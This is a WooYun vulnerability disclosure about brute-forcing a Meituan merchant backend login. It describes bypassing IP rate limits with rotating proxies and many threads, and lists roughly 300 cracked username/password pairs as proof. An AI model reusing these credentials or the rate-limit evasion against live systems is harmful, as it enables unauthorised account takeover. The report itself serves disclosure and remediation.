某电商某后台可暴力破解，大量弱口令，验证破解316个账号 | wooyun-2014-065743

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-065743

漏洞标题：

某电商某后台可暴力破解，大量弱口令，验证破解316个账号

漏洞详情

披露状态：

2014-06-21：细节已通知厂商并且等待厂商处理中
2014-06-23：厂商已经确认，细节仅向厂商公开
2014-07-03：细节向核心白帽子及相关领域专家公开
2014-07-13：细节向普通白帽子公开
2014-07-23：细节向实习白帽子公开
2014-08-05：细节向公众公开

简要描述：

某电商某后台可以暴力破解，发现大量弱口令。验证破解帐号若干

详细说明：

目前是从web入手暴力破解的: http://e.meituan.com/
有几个问题：
1)错误提示过于详细，可以猜解用户名。这把攻击者的扫描工作降低了一个指数级。
2)IP有过滤，不能访问过快。但可被攻击者绕过。
我采用的方法是：挂72个HTTP代理，随机产生SID，30个扫描线程。
如果遇到IP被临时封禁，就随机换另一个代理继续尝试。
3)弱口令较多，建议在注册、修改密码处增加强度限制。
4)目前还没有启用验证码

漏洞证明：

login=afu&password=12345678
login=ata&password=123456
login=awei&password=12345678
login=aikang&password=123456 
login=aimei&password=111111
login=aimu&password=123456
login=anjin&password=123456
login=anjing&password=123456
login=anshun&password=123456
login=angle&password=123456
login=aoti&password=123456
login=aoyuan&password=123456789
login=aoyou&password=123456
login=bama&password=123456
login=banghao&password=123456  
login=baojian&password=123456789
login=baoli&password=123456 
login=baolong&password=123456  
login=baoting&password=12345678
login=baoxiang&password=123456
login=beiou&password=123456
login=binge&password=11223344
login=binjiang&password=123456789
login=bobo&password=123456
login=boyuan&password=123456
login=caoyang&password=123456
login=changxin&password=123456789
login=chaoji&password=123456
login=chezhan&password=123456
login=chencong&password=111111
login=chenjie&password=000000
login=chenxue&password=000000
login=chenyu&password=111111
login=chengshan&password=123456
login=chihao&password=123456
login=chijia&password=123456
login=chuke&password=12345678
login=chuansha&password=123456
login=cikai&password=1234567890
login=cuiwei&password=123456789
login=cuiye&password=123456
login=dakang&password=123456
login=daning&password=123456
login=daming&password=123456
login=daixian&password=123456789
login=dehao&password=123456
login=dinghao&password=123456
login=dingwei&password=111111
login=dongguan&password=123456
login=dongmen&password=123456
login=donglin&password=111111
login=duihuan&password=88888888
login=duoduo&password=123456
login=fangchao&password=123456789
login=fangyang&password=123456
login=feike&password=123456
login=feiniu&password=000000
login=feifei&password=123456
login=fengkuang&password=123456
login=fengjin&password=123456
login=fengxian&password=123456
login=fukuan&password=123456
login=ganghui&password=123456
login=gaojing&password=123456789
login=gaochun&password=123456789
login=geting&password=123456
login=geshang&password=147258369
login=gongshi&password=123456
login=gongxue&password=000000
login=gubei&password=123456
login=guanzhu&password=123456789
login=guode&password=123456
login=guoran&password=123456
login=guotai&password=123456
login=haier&password=12345678
login=hailan&password=123456
login=haishang&password=123456
login=hanshi&password=123456
login=haoniu&password=123456
login=haozao&password=123456
login=haosi&password=123456
login=hengji&password=123456
login=hengshan&password=123456
login=hongfu&password=123456
login=hongqiao&password=123456
login=hongjing&password=000000
login=hongxiu&password=123456
login=hongwei&password=123456
login=hongyi&password=123456
login=huachi&password=123456
login=huagui&password=123456
login=huajin&password=123456
login=huachao&password=123456
login=hualu&password=123456
login=huayu&password=123456
login=huanyi&password=123456
login=huanle&password=123456789
login=huangxing&password=123456
login=huirong&password=123456
login=jiji&password=123456
login=jidao&password=123456789
login=jixiang&password=123456
login=jiading&password=123456
login=jiahe&password=123456
login=jiahua&password=123456789
login=jiana&password=123456789
login=jiamei&password=123456
login=jianai&password=123456
login=jianai&password=123456
login=jiana&password=123456789
login=jianteng&password=123456
login=jianghui&password=12345678
login=jiaotai&password=123456
login=jiaozhou&password=123456
login=jieba&password=123456
login=jieyu&password=123456
login=jieyi&password=123456
login=jieyuan&password=123456
login=jingan&password=123456
login=jinjin&password=123456
login=jinbang&password=123456
login=jinma&password=123456
login=jingan&password=123456
login=jiulin&password=123456
login=jiuxian&password=000000
login=juli&password=111111
login=kadang&password=123456
login=katong&password=123456
login=kaisa&password=123456
login=kaiwei&password=123456
login=kanghui&password=123456
login=kangkai&password=000000
login=kangli&password=123456
login=kaoyan&password=123456789
login=kela&password=123456
login=kelan&password=123456
login=kongzhong&password=123456
login=kuaizi&password=123456
login=kuaiwang&password=123456
login=laimei&password=123456789
login=languang&password=123456
login=lanse&password=123456789
login=lansheng&password=123456
login=lechen&password=123456
login=lemin&password=11111111
login=lifang&password=111111
login=libo&password=11111111
login=liqing&password=111111
login=liyan&password=123456
login=lianfa&password=123456
login=lianqi&password=123456
login=liangding&password=123456
login=liangyou&password=123456
login=liaoji&password=123456
login=linyue&password=123456789
login=linghai&password=987654321
login=lingyi&password=123456
login=liuhong&password=123456789
login=liujia&password=111111
login=longming&password=123456
login=luzheng&password=123456
login=luojing&password=123456
login=luoyan&password=123456
login=matou&password=12345678
login=mayu&password=123456789
login=maidu&password=123456
login=maidou&password=123456
login=manzi&password=123456
login=meichen&password=123456
login=meichuan&password=123456
login=mengmeng&password=123456
login=mini&password=123456
login=miya&password=123456
login=mianbian&password=123456
login=miaolian&password=123456
login=minju&password=123456
login=minjian&password=123456
login=mingdao&password=111111
login=mingguan&password=123456
login=mingquan&password=123456
login=mingzhong&password=123456789
login=mudan&password=123456
login=mujia&password=123456
login=muxiang&password=123456
login=nala&password=123456
login=natie&password=123456789
login=nanhui&password=123456
login=nanhui&password=123456
login=niaoli&password=123456
login=nike&password=123456
login=oupeng&password=123456
login=pashi&password=123456789
login=paopu&password=123456
login=panzi&password=123456
login=pika&password=123456
login=pingguo&password=123456
login=pujiang&password=123456
login=pusan&password=123456
login=putuo&password=123456
login=puji&password=123456
login=qibao&password=123456
login=qihuang&password=123456
login=qilu&password=123456
login=qianjia&password=123456
login=qingchun&password=123456
login=qingpu&password=123456
login=qupiao&password=123456
login=quanxi&password=123456
login=rujia&password=123456789
login=ruidu&password=000000
login=runshun&password=123456
login=saika&password=000000
login=sanwei&password=123456
login=sanwa&password=12345678
login=sanying&password=123456
login=sanyou&password=123456
login=shaxuan&password=123456
login=shayi&password=123456
login=shazhe&password=123456
login=shaya&password=123456
login=shaige&password=123456
login=shaili&password=123456
login=shaima&password=123456
login=shanliang&password=123456789
login=shangnan&password=123456
login=shangxiu&password=123456
login=shangyu&password=123456
login=shenkang&password=123456789
login=shenpeng&password=123456
login=shengjia&password=123456
login=shengshi&password=123456
login=shiguang&password=123456
login=shijue&password=12345678
login=shiquan&password=123456
login=shume&password=123456789
login=shufu&password=123456
login=shuixing&password=123456
login=siping&password=123456
login=sixian&password=123456
login=suwa&password=123456789
login=sunyan&password=123456789
login=taige&password=123456789
login=taifu&password=123456
login=tanchu&password=123456
login=tangqiao&password=123456
login=tangshan&password=12345678
login=tebu&password=123456
login=tianshuo&password=123456789
login=tiantian&password=123456
login=tuanke&password=123456
login=wanjia&password=123456
login=wanyu&password=123456
login=wanghui&password=987654321
login=wangxian&password=987654321
login=wangyuan&password=11111111
login=weifang&password=123456
login=weike&password=123456
login=weiyi&password=123456
login=weiyan&password=88888888
login=wenfeng&password=123456
login=wener&password=12345678
login=wuning&password=123456
login=wusong&password=123456
login=xilang&password=123456
login=xixi&password=123456
login=xixia&password=123456789
login=xiamen&password=123456789
login=xianzhi&password=123456789
login=xiaoji&password=123456
login=xinan&password=123456
login=xinde&password=123456789
login=xinwang&password=123456
login=xinyu&password=123123123
login=xinzhuang&password=123456
login=xingmei&password=123456
login=xueqin&password=000000
login=yashi&password=123456
login=yajie&password=123456
login=yangguang&password=123456
login=yanwang&password=123456
login=yangpeng&password=987654321
login=yifeng&password=123456
login=yijian&password=123456
login=yidong&password=123456789
login=yile&password=123456
login=yixiang&password=123456
login=yixin&password=123456
login=yiya&password=123456
login=yinjiao&password=123456
login=yonghua&password=123456
login=yongtai&password=123456
login=yongye&password=123456
login=youguo&password=123456789
login=youken&password=123456
login=youyi&password=123456
login=yuandi&password=123456789
login=yuanshen&password=123456
login=yuanzi&password=12345678
login=yuanwang&password=12345678
login=yuanzheng&password=123456
login=yueyu&password=123456
login=yunduan&password=123456789
login=yunliu&password=123456
login=zhabei&password=123456
login=zhanpeng&password=123456789
login=zhangjing&password=111111
login=zhangjin&password=11111111
login=zhangyang&password=123456
login=zhangyu&password=11111111
login=zhaoqi&password=111111
login=zhengyi&password=123456
login=zhongshan&password=123456
login=zhongyuan&password=123456
login=zhulin&password=123456
login=zipai&password=123456
login=zishang&password=123456

修复方案：

可参考详细说明

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2014-06-23 22:00

厂商回复：

感谢您的关注，漏洞已修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞